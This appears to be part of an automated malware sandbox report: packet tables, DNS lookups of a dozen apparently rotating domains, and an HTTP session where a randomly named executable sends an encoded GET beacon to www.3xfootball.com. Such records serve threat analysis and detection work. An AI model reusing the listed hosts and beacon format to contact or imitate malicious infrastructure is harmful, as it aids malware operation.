Apr 19, 2024 03:30:40.522558928 CEST	80	49755	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:40.522577047 CEST	80	49755	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:40.522627115 CEST	49755	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:40.522627115 CEST	49755	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:40.522627115 CEST	49755	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:40.522782087 CEST	80	49755	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:40.523049116 CEST	49755	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:41.877187967 CEST	49755	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:42.896085978 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.000211954 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.002208948 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.007090092 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.111813068 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187372923 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187417030 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187455893 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187494993 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187536955 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187570095 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.187570095 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.187576056 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187616110 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187652111 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187690020 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187728882 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187766075 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187803984 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.187803984 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.187808037 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187859058 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.187901020 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.187901020 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.188057899 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.188118935 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.188154936 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.188172102 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.188719988 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:43.188791990 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.192373991 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.192373991 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.502194881 CEST	49756	80	192.168.2.6	23.227.38.74
Apr 19, 2024 03:30:43.606281042 CEST	80	49756	23.227.38.74	192.168.2.6
Apr 19, 2024 03:30:49.171890974 CEST	49757	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:49.276200056 CEST	80	49757	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:49.277090073 CEST	49757	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:49.281229019 CEST	49757	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:49.385713100 CEST	80	49757	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:49.575201035 CEST	80	49757	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:49.578047991 CEST	80	49757	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:49.578104019 CEST	49757	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:49.578121901 CEST	80	49757	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:49.578180075 CEST	49757	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:50.783423901 CEST	49757	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:51.802786112 CEST	49758	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:51.908117056 CEST	80	49758	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:51.908205986 CEST	49758	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:51.910639048 CEST	49758	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:52.014902115 CEST	80	49758	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:52.204716921 CEST	80	49758	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:52.207983017 CEST	80	49758	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:52.208050013 CEST	49758	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:52.208198071 CEST	80	49758	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:52.208451986 CEST	49758	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:53.428126097 CEST	49758	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:54.442946911 CEST	49760	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:54.547460079 CEST	80	49760	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:54.550944090 CEST	49760	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:54.553617001 CEST	49760	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:54.658029079 CEST	80	49760	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:54.658058882 CEST	80	49760	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:54.847872019 CEST	80	49760	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:54.850615978 CEST	80	49760	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:54.850651979 CEST	80	49760	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:54.850827932 CEST	49760	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:56.064776897 CEST	49760	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:57.083534002 CEST	49761	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:57.188023090 CEST	80	49761	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:57.190943003 CEST	49761	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:57.194967985 CEST	49761	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:57.299549103 CEST	80	49761	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:57.488369942 CEST	80	49761	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:57.501636028 CEST	80	49761	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:57.501698017 CEST	80	49761	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:57.501713037 CEST	49761	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:57.501739025 CEST	80	49761	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:57.501776934 CEST	80	49761	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:57.501813889 CEST	80	49761	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:57.501818895 CEST	49761	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:57.501853943 CEST	80	49761	34.111.148.214	192.168.2.6
Apr 19, 2024 03:30:57.501888990 CEST	49761	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:57.501900911 CEST	49761	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:57.506282091 CEST	49761	80	192.168.2.6	34.111.148.214
Apr 19, 2024 03:30:57.610884905 CEST	80	49761	34.111.148.214	192.168.2.6
Apr 19, 2024 03:31:02.925097942 CEST	49762	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:03.067153931 CEST	80	49762	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:03.067389965 CEST	49762	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:03.070816040 CEST	49762	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:03.212757111 CEST	80	49762	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:03.212836981 CEST	80	49762	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:03.213258028 CEST	80	49762	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:03.214876890 CEST	49762	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:04.582804918 CEST	49762	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:05.599817038 CEST	49763	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:05.743689060 CEST	80	49763	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:05.743791103 CEST	49763	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:05.749131918 CEST	49763	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:05.891175032 CEST	80	49763	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:05.891309023 CEST	80	49763	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:05.891560078 CEST	80	49763	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:05.891618967 CEST	49763	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:07.252157927 CEST	49763	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:08.271135092 CEST	49764	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:08.413094997 CEST	80	49764	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:08.416793108 CEST	49764	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:08.416793108 CEST	49764	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:08.558911085 CEST	80	49764	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:08.558971882 CEST	80	49764	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:08.559284925 CEST	80	49764	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:08.566920042 CEST	49764	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:09.924185038 CEST	49764	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:10.942967892 CEST	49765	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:11.085305929 CEST	80	49765	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:11.086910963 CEST	49765	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:11.090815067 CEST	49765	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:11.232688904 CEST	80	49765	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:11.232815027 CEST	80	49765	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:11.233046055 CEST	80	49765	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:11.234931946 CEST	49765	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:11.236582041 CEST	49765	80	192.168.2.6	217.196.55.202
Apr 19, 2024 03:31:11.379005909 CEST	80	49765	217.196.55.202	192.168.2.6
Apr 19, 2024 03:31:16.448962927 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:31:17.455244064 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:31:19.455244064 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:31:23.455248117 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:31:31.455255985 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:31:38.474884033 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:31:39.470868111 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:31:41.470868111 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:31:45.470990896 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:31:53.471013069 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:32:00.507005930 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:32:01.502959967 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:32:03.517772913 CEST	49766	80	192.168.2.6	185.237.107.49
Apr 19, 2024 03:32:07.580415010 CEST	49766	80	192.168.2.6	185.237.107.49

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2024 03:28:30.124490023 CEST	64189	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:28:30.729914904 CEST	53	64189	1.1.1.1	192.168.2.6
Apr 19, 2024 03:28:46.396486998 CEST	53341	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:28:46.849692106 CEST	53	53341	1.1.1.1	192.168.2.6
Apr 19, 2024 03:29:01.162033081 CEST	62072	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:29:01.725330114 CEST	53	62072	1.1.1.1	192.168.2.6
Apr 19, 2024 03:29:15.889090061 CEST	64285	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:29:16.209595919 CEST	53	64285	1.1.1.1	192.168.2.6
Apr 19, 2024 03:29:29.851531982 CEST	60225	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:29:30.549125910 CEST	53	60225	1.1.1.1	192.168.2.6
Apr 19, 2024 03:29:44.396444082 CEST	56964	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:29:44.506700039 CEST	53	56964	1.1.1.1	192.168.2.6
Apr 19, 2024 03:29:58.411755085 CEST	58971	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:29:58.909936905 CEST	53	58971	1.1.1.1	192.168.2.6
Apr 19, 2024 03:30:06.974756956 CEST	50502	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:30:07.196167946 CEST	53	50502	1.1.1.1	192.168.2.6
Apr 19, 2024 03:30:20.600126982 CEST	65260	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:30:21.015222073 CEST	53	65260	1.1.1.1	192.168.2.6
Apr 19, 2024 03:30:34.756840944 CEST	55567	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:30:34.980566025 CEST	53	55567	1.1.1.1	192.168.2.6
Apr 19, 2024 03:30:48.217502117 CEST	49785	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:30:49.166377068 CEST	53	49785	1.1.1.1	192.168.2.6
Apr 19, 2024 03:31:02.521532059 CEST	65319	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:31:02.922084093 CEST	53	65319	1.1.1.1	192.168.2.6
Apr 19, 2024 03:31:16.241461039 CEST	61686	53	192.168.2.6	1.1.1.1
Apr 19, 2024 03:31:16.443337917 CEST	53	61686	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 19, 2024 03:28:30.124490023 CEST	192.168.2.6	1.1.1.1	0xba96	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:28:46.396486998 CEST	192.168.2.6	1.1.1.1	0x6517	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:29:01.162033081 CEST	192.168.2.6	1.1.1.1	0x81dd	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:29:15.889090061 CEST	192.168.2.6	1.1.1.1	0x2acd	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:29:29.851531982 CEST	192.168.2.6	1.1.1.1	0x9e07	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:29:44.396444082 CEST	192.168.2.6	1.1.1.1	0xf	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:29:58.411755085 CEST	192.168.2.6	1.1.1.1	0xf5b7	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:30:06.974756956 CEST	192.168.2.6	1.1.1.1	0xf320	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:30:20.600126982 CEST	192.168.2.6	1.1.1.1	0x1fdb	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:30:34.756840944 CEST	192.168.2.6	1.1.1.1	0x9929	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:30:48.217502117 CEST	192.168.2.6	1.1.1.1	0x34df	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:31:02.521532059 CEST	192.168.2.6	1.1.1.1	0x7af1	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:31:16.241461039 CEST	192.168.2.6	1.1.1.1	0xf61d	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 19, 2024 03:28:30.729914904 CEST	1.1.1.1	192.168.2.6	0xba96	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:28:46.849692106 CEST	1.1.1.1	192.168.2.6	0x6517	No error (0)	www.kasegitai.tokyo		202.172.28.202	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:29:01.725330114 CEST	1.1.1.1	192.168.2.6	0x81dd	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:29:16.209595919 CEST	1.1.1.1	192.168.2.6	0x2acd	No error (0)	www.antonio-vivaldi.mobi		46.30.213.191	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:29:30.549125910 CEST	1.1.1.1	192.168.2.6	0x9e07	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 03:29:30.549125910 CEST	1.1.1.1	192.168.2.6	0x9e07	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 03:29:30.549125910 CEST	1.1.1.1	192.168.2.6	0x9e07	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:29:44.506700039 CEST	1.1.1.1	192.168.2.6	0xf	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:29:58.909936905 CEST	1.1.1.1	192.168.2.6	0xf5b7	Server failure (2)	www.liangyuen528.com	none	none	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:30:07.196167946 CEST	1.1.1.1	192.168.2.6	0xf320	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:30:21.015222073 CEST	1.1.1.1	192.168.2.6	0x1fdb	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 03:30:21.015222073 CEST	1.1.1.1	192.168.2.6	0x1fdb	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:30:34.980566025 CEST	1.1.1.1	192.168.2.6	0x9929	No error (0)	www.donnavariedades.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 03:30:34.980566025 CEST	1.1.1.1	192.168.2.6	0x9929	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:30:49.166377068 CEST	1.1.1.1	192.168.2.6	0x34df	No error (0)	www.660danm.top		34.111.148.214	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:30:49.166377068 CEST	1.1.1.1	192.168.2.6	0x34df	No error (0)	www.660danm.top		34.120.249.181	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:31:02.922084093 CEST	1.1.1.1	192.168.2.6	0x7af1	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 03:31:02.922084093 CEST	1.1.1.1	192.168.2.6	0x7af1	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
Apr 19, 2024 03:31:16.443337917 CEST	1.1.1.1	192.168.2.6	0xf61d	No error (0)	www.joyesi.xyz		185.237.107.49	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.kasegitai.tokyo

www.goldenjade-travel.com

www.antonio-vivaldi.mobi

www.magmadokum.com

www.rssnewscast.com

www.techchains.info

www.elettrosistemista.zip

www.donnavariedades.com

www.660danm.top

www.empowermedeco.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49717	154.215.72.110	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:28:31.042812109 CEST	514	OUT	GET /fo8o/?VVq=lF_H&bD=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 19, 2024 03:28:31.345974922 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 19 Apr 2024 01:28:31 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Apr 19, 2024 03:28:31.555383921 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 19 Apr 2024 01:28:31 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49719	202.172.28.202	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
